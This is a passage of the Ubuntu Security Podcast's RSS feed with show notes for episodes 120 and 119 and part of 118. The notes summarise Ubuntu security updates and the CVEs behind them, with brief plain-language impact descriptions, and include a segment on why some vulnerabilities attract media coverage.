<h3 id="usn-4987-1-exiftool-vulnerability-01-50">[<a href="https://ubuntu.com/security/notices/USN-4987-1">USN-4987-1</a>] ExifTool vulnerability [01:50]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22204">CVE-2021-22204</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Was originally reported to gitlab via hackerone as exiftool is used on
image uploads to redact image metadata etc - they coordinated the fix
with exiftool upstream. RCE when parsing a malicious DjVu image - uses
perl to parse DjVu and in doing so it eval&rsquo;s certain constructs without
properly validating them</li>
</ul>
<h3 id="usn-4988-1-imagemagick-vulnerabilities-03-17">[<a href="https://ubuntu.com/security/notices/USN-4988-1">USN-4988-1</a>] ImageMagick vulnerabilities [03:17]</h3>
<ul>
<li>34 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20176">CVE-2021-20176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27776">CVE-2020-27776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27775">CVE-2020-27775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27774">CVE-2020-27774</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27773">CVE-2020-27773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27772">CVE-2020-27772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27771">CVE-2020-27771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27770">CVE-2020-27770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27769">CVE-2020-27769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27768">CVE-2020-27768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27767">CVE-2020-27767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27766">CVE-2020-27766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27765">CVE-2020-27765</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27764">CVE-2020-27764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27763">CVE-2020-27763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27762">CVE-2020-27762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27761">CVE-2020-27761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27760">CVE-2020-27760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27759">CVE-2020-27759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27758">CVE-2020-27758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27757">CVE-2020-27757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27756">CVE-2020-27756</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27755">CVE-2020-27755</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27754">CVE-2020-27754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27753">CVE-2020-27753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27751">CVE-2020-27751</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27750">CVE-2020-27750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25676">CVE-2020-25676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25675">CVE-2020-25675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25674">CVE-2020-25674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25666">CVE-2020-25666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25665">CVE-2020-25665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19667">CVE-2020-19667</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14528">CVE-2017-14528</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>every ~30 weeks we seem to have another ImageMagick update - so that time again ;)</li>
<li>DoS, RCE etc</li>
</ul>
<h3 id="usn-4989-1-bluez-vulnerabilities-03-56">[<a href="https://ubuntu.com/security/notices/USN-4989-1">USN-4989-1</a>] BlueZ vulnerabilities [03:56]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3588">CVE-2021-3588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27153">CVE-2020-27153</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26558">CVE-2020-26558</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 bluetooth core specification issue - during pairing a nearby attacker
could interpose on the pairing process and hence complete the pairing
instead of the intended device</li>
<li>2 issues in bluez code itself
<ul>
<li>double free (UAF) + OOB read</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="how-to-get-media-coverage-for-your-linux-vulnerabilities-04-48">How to get media coverage for your Linux vulnerabilities [04:48]</h3>
<ul>
<li>In <a href="https://ubuntusecuritypodcast.org/episode-119/">Episode 119</a> covered an update for polkit - the following day Github
<a href="https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/">published a blog post</a> with significant details of the vuln - then we saw
a heap of media coverage
<ul>
<li><a href="https://www.theregister.com/2021/06/11/linux_polkit_package_patched/">https://www.theregister.com/2021/06/11/linux_polkit_package_patched/</a></li>
<li><a href="https://www.zdnet.com/article/nasty-linux-systemd-root-level-security-bug-revealed-and-patched/">https://www.zdnet.com/article/nasty-linux-systemd-root-level-security-bug-revealed-and-patched/</a></li>
</ul>
</li>
<li>Why did this vuln get so much coverage when lots of others don&rsquo;t?
<ul>
<li>Great technical detail from a reputable and popular source (github)</li>
<li>Very clearly written and easy to understand
<ul>
<li>Is a simple logic error that can be triggered via a race-condition in
a privileged daemon</li>
<li>PoC can be implemented as a 1 line bash invocation so is also simple
to understand</li>
<li>c.f. a complicated memory corruption vuln or similar (ie no need to
understand memory management, heap grooming etc etc)</li>
</ul>
</li>
</ul>
</li>
<li>Or give it a cool name and logo
<ul>
<li>heartbleed was one of the first to do this and this likely helped it
get noticed and patched (plus fame/notoriety for the researchers)</li>
<li>Since then we have seen many (shellshock, stagefright, dirty cow,
spectre, meltdown, boothole etc) but not all vulns that get names/logos
are created equal - impact / exploitability varies greatly - so a name
and a logo doesn&rsquo;t necessarily mean a vuln is critical</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E120.mp3" length="8246704" type="audio/mpeg" /><itunes:duration>10:16</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 119
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-119/</link>
          <pubDate>Fri, 11 Jun 2021 10:53:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>0a9ae10a119edff8c63af0049d12ad1ec78c835e904acecd3a32404bff978eae43ca09a1f89f65d4dcb45a633bca48021a27f8a7f9337444bbfd87ae127a8e7e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 119</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover security updates for the Linux kernel, PolicyKit, Intel
  Microcode and more, plus we look at a report of an apparent malicious snap
  in the Snap Store and some of the mechanics behind snap confinement.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover security updates for the Linux kernel, PolicyKit, Intel
  Microcode and more, plus we look at a report of an apparent malicious snap
  in the Snap Store and some of the mechanics behind snap confinement.
  </itunes:summary>
        <description>  This week we cover security updates for the Linux kernel, PolicyKit, Intel
  Microcode and more, plus we look at a report of an apparent malicious snap
  in the Snap Store and some of the mechanics behind snap confinement.
  </description>
        <googleplay:description>  This week we cover security updates for the Linux kernel, PolicyKit, Intel
  Microcode and more, plus we look at a report of an apparent malicious snap
  in the Snap Store and some of the mechanics behind snap confinement.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover security updates for the Linux kernel, PolicyKit, Intel
Microcode and more, plus we look at a report of an apparent malicious snap
in the Snap Store and some of the mechanics behind snap confinement.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>42 unique CVEs addressed</p>
<h3 id="usn-4979-1-linux-kernel-vulnerabilities-01-04">[<a href="https://ubuntu.com/security/notices/USN-4979-1">USN-4979-1</a>] Linux kernel vulnerabilities [01:04]</h3>
<ul>
<li>13 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3483">CVE-2021-3483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3428">CVE-2021-3428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33033">CVE-2021-33033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31916">CVE-2021-31916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29647">CVE-2021-29647</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28972">CVE-2021-28972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28971">CVE-2021-28971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28964">CVE-2021-28964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28660">CVE-2021-28660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25673">CVE-2020-25673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25672">CVE-2020-25672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25671">CVE-2020-25671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25670">CVE-2020-25670</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 based kernel</li>
<li>integer overflow in ext4 extent handling -&gt; could be triggered by
mounting an malicious ext4 image -&gt; crash (DoS)</li>
<li>reference counting error in firewire packet sniffer driver - UAF</li>
<li>NFC LLCP issues above</li>
</ul>
<h3 id="usn-4982-1-linux-kernel-vulnerabilities-02-23">[<a href="https://ubuntu.com/security/notices/USN-4982-1">USN-4982-1</a>] Linux kernel vulnerabilities [02:23]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3483">CVE-2021-3483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31916">CVE-2021-31916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29647">CVE-2021-29647</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29264">CVE-2021-29264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28972">CVE-2021-28972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28971">CVE-2021-28971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28964">CVE-2021-28964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28950">CVE-2021-28950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28688">CVE-2021-28688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25673">CVE-2020-25673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25672">CVE-2020-25672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25671">CVE-2020-25671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25670">CVE-2020-25670</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 based kernel</li>
</ul>
<h3 id="usn-4984-1-linux-kernel-vulnerabilities-02-39">[<a href="https://ubuntu.com/security/notices/USN-4984-1">USN-4984-1</a>] Linux kernel vulnerabilities [02:39]</h3>
<ul>
<li>13 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3483">CVE-2021-3483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33033">CVE-2021-33033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31916">CVE-2021-31916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-30002">CVE-2021-30002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29647">CVE-2021-29647</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28972">CVE-2021-28972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28971">CVE-2021-28971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28964">CVE-2021-28964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28952">CVE-2021-28952</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28950">CVE-2021-28950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28688">CVE-2021-28688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28660">CVE-2021-28660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28038">CVE-2021-28038</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.8 based kernel</li>
</ul>
<h3 id="usn-4977-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4977-1">USN-4977-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3501">CVE-2021-3501</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29155">CVE-2021-29155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25673">CVE-2020-25673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25672">CVE-2020-25672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25671">CVE-2020-25671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25670">CVE-2020-25670</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.11 based kernel</li>
<li>OOB write in KVM VMX implementation (crash -&gt; DoS, RCE)</li>
<li>eBPF Spectre side-channel attack - info leak</li>
<li>NFC LLCP (logical link control protocol) - allows to multiplex a single
connection between two NFC devices
<ul>
<li>infinite loop on error condition -&gt; DoS</li>
<li>memory leak</li>
<li>reference count mishandling -&gt; crash -&gt; DoS</li>
</ul>
</li>
</ul>
<h3 id="usn-4983-1-linux-kernel--oem--vulnerabilities-03-32">[<a href="https://ubuntu.com/security/notices/USN-4983-1">USN-4983-1</a>] Linux kernel (OEM) vulnerabilities [03:32]</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3501">CVE-2021-3501</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31829">CVE-2021-31829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29155">CVE-2021-29155</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33200">CVE-2021-33200</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.10 based kernel</li>
<li>OOB write in KVM VMX implementation (crash -&gt; DoS, RCE)</li>
<li>eBPF Spectre side-channel attacks - verifier fails to stop loading of eBPF
programs which could cause speculative loads -&gt; info leak</li>
<li>eBPF pointer limit error - OOB read/write - crash / RCE</li>
</ul>
<h3 id="usn-4978-1-firefox-vulnerabilities-03-40">[<a href="https://ubuntu.com/security/notices/USN-4978-1">USN-4978-1</a>] Firefox vulnerabilities [03:40]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29960">CVE-2021-29960</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29967">CVE-2021-29967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29966">CVE-2021-29966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29961">CVE-2021-29961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29959">CVE-2021-29959</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>89.0 upstream release
<ul>
<li>not only the new visual UI PLUS enhanced private browsing mode via
&ldquo;Total Cookie Protection&rdquo; - confines cookies to the site where they
were created to avoid tracking across sites - PLUS a bunch of security
fixes including
<ul>
<li>cached the last filename of a printed file even in private browsing
mode - would then surface this next time you choose to print a file</li>
<li>Various memory safety issues - RCE / crash etc</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4980-1-polkit-vulnerability-04-43">[<a href="https://ubuntu.com/security/notices/USN-4980-1">USN-4980-1</a>] polkit vulnerability [04:43]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3560">CVE-2021-3560</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Daemons often use policykit to ask whether a user&rsquo;s application is
permitted to perform an action - to do this, they send the DBus name of
the process to polkit and it looks up the resulting uid/pid via an
internal function polkit_system_bus_name_get_creds_sync() - logic error
within policykit when looking if the process in question were to
disconnect from DBus at the right time, policykit would return an error
but also a boolean TRUE value indicating success (depends on how the
daemon interpreted this value with an associated error). This could then
allow an application which was not privileged to be able to perform more
privileged actions. Fixed to actually return FALSE in this case and avoid
any potential confusion.</li>
</ul>
<h3 id="usn-4981-1-squid-vulnerabilities-06-11">[<a href="https://ubuntu.com/security/notices/USN-4981-1">USN-4981-1</a>] Squid vulnerabilities [06:11]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33620">CVE-2021-33620</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31808">CVE-2021-31808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31807">CVE-2021-31807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31806">CVE-2021-31806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28662">CVE-2021-28662</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28652">CVE-2021-28652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28651">CVE-2021-28651</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All DoS issues - memory leaks, OOB reads etc, able to be triggered by
remote attackers</li>
</ul>
<h3 id="usn-4969-3-dhcp-regression-06-28">[<a href="https://ubuntu.com/security/notices/USN-4969-3">USN-4969-3</a>] DHCP regression [06:28]</h3>
<ul>
<li>Affecting Hirsute (21.04)</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-118/">Episode 118</a> - update for 21.04 <strong>only</strong> introduced a regression where valid
config files would be seen as invalid and rejected and hence
isc-dhcp-server would fail to start - actually caused as a result of the
newer toolchain used in 21.04 - has stricter aliasing checking and so
would treat certain operations introduced in this change as UB and change
code-flow as a result. Fixed by disabling this stricter aliasing checking
in the build to restore the original behaviour.</li>
</ul>
<h3 id="usn-4937-2-gnome-autoar-regression-07-22">[<a href="https://ubuntu.com/security/notices/USN-4937-2">USN-4937-2</a>] GNOME Autoar regression [07:22]</h3>
<ul>
<li><a href="https://ubuntusecuritypodcast.org/episode-115/">Episode 115</a></li>
<li>Affecting Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)</li>
<li>upstream regression where when extracting an archive, only an empty
directory would be created if an archive contained a file of the same
name as the archive itself - fixed to avoid creating this directory first
so that files would then actually get created as expected</li>
</ul>
<h3 id="usn-4985-1-intel-microcode-vulnerabilities-07-48">[<a href="https://ubuntu.com/security/notices/USN-4985-1">USN-4985-1</a>] Intel Microcode vulnerabilities [07:48]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24513">CVE-2020-24513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24512">CVE-2020-24512</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24511">CVE-2020-24511</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-5715">CVE-2017-5715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-24489">CVE-2021-24489</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest intel-microcode release from upstream, fixes a number of security
issues for particular processors PLUS potential stability issues that
have been seen in previous microcode releases (processor would hang if
tried to load a too new microcode version compared to the one contained
within the BIOS)
<ul>
<li>potential cross-domain issue with Intel VT-d (priv esc) plus a fix for
an issue which would result in EIBRS (Spectre) mitigations not being
applied, cache-lines not being flushed properly and a speculative
execution issue specific to Atom processors via micro-arch buffers.</li>
</ul>
</li>
</ul>
<h3 id="usn-4986-1-rpcbind-vulnerability-09-02">[<a href="https://ubuntu.com/security/notices/USN-4986-1">USN-4986-1</a>] rpcbind vulnerability [09:02]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-8779">CVE-2017-8779</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>DoS since would fail to free memory allocated during particular
requests - could then be made to crash by allocating too much memory</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="odrive-unofficial-snap-investigation-09-20">odrive-unofficial snap investigation [09:20]</h3>
<ul>
<li><a href="https://twitter.com/XHaughin/status/1400743600464355331">https://twitter.com/XHaughin/status/1400743600464355331</a></li>
</ul>
<h3 id="the-magic-behind-snap-interfaces-12-36">The magic behind snap interfaces [12:36]</h3>
<ul>
<li><a href="https://ubuntu.com/blog/the-magic-behind-snap-interfaces">https://ubuntu.com/blog/the-magic-behind-snap-interfaces</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E119.mp3" length="11276225" type="audio/mpeg" /><itunes:duration>14:38</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 118
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-118/</link>
          <pubDate>Fri, 04 Jun 2021 15:04:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>147bfb7e506ff059e07375b957ab03b698f4831786804c5adcf05184baf7e102d928347faf826134ee4d7a9f0c9a43b2069872bcc1d17758e507b6b33a7cff8f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 118</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at DMCA notices sent against Ubuntu ISOs plus security
  updates for nginx, DHCP, Lasso, Django, Dnsmasq and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at DMCA notices sent against Ubuntu ISOs plus security
  updates for nginx, DHCP, Lasso, Django, Dnsmasq and more.
  </itunes:summary>
        <description>  This week we look at DMCA notices sent against Ubuntu ISOs plus security
  updates for nginx, DHCP, Lasso, Django, Dnsmasq and more.
  </description>
        <googleplay:description>  This week we look at DMCA notices sent against Ubuntu ISOs plus security
  updates for nginx, DHCP, Lasso, Django, Dnsmasq and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at DMCA notices sent against Ubuntu ISOs plus security
updates for nginx, DHCP, Lasso, Django, Dnsmasq and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-4967-1-usn-4967-2-nginx-vulnerability-00-50">[<a href="https://ubuntu.com/security/notices/USN-4967-1">USN-4967-1</a>, <a href="https://ubuntu.com/security/notices/USN-4967-2">USN-4967-2</a>] nginx vulnerability [00:50]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23017">CVE-2021-23017</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>1 byte buffer overflow, able to be trigged by a crafted DNS response -
UDP so could possibly be more easily forged than TCP (less state) -
crash, RCE</li>
</ul>
<h3 id="usn-4968-1-usn-4968-2-lz4-vulnerability-01-27">[<a href="https://ubuntu.com/security/notices/USN-4968-1">USN-4968-1</a>, <a href="https://ubuntu.com/security/notices/USN-4968-2">USN-4968-2</a>] LZ4 vulnerability [01:27]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3520">CVE-2021-3520</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>integer overflow -&gt; OOB write -&gt; crash, RCE - crafted lz4 archive</li>
</ul>
<h3 id="usn-4969-1-usn-4969-2-dhcp-vulnerability-01-52">[<a href="https://ubuntu.com/security/notices/USN-4969-1">USN-4969-1</a>, <a href="https://ubuntu.com/security/notices/USN-4969-2">USN-4969-2</a>] DHCP vulnerability [01:52]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25217">CVE-2021-25217</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted lease file could trigger an OOB read - could be triggered against
both dhclient and dhcpd - DoS. In case of dhcpd could also cause that
lease to be deleted (and the one that follows it in the lease database).
ISC claim impact is LESS is using compiler hardening
(stack-protector-strong) - since in this case will trigger an abort - but
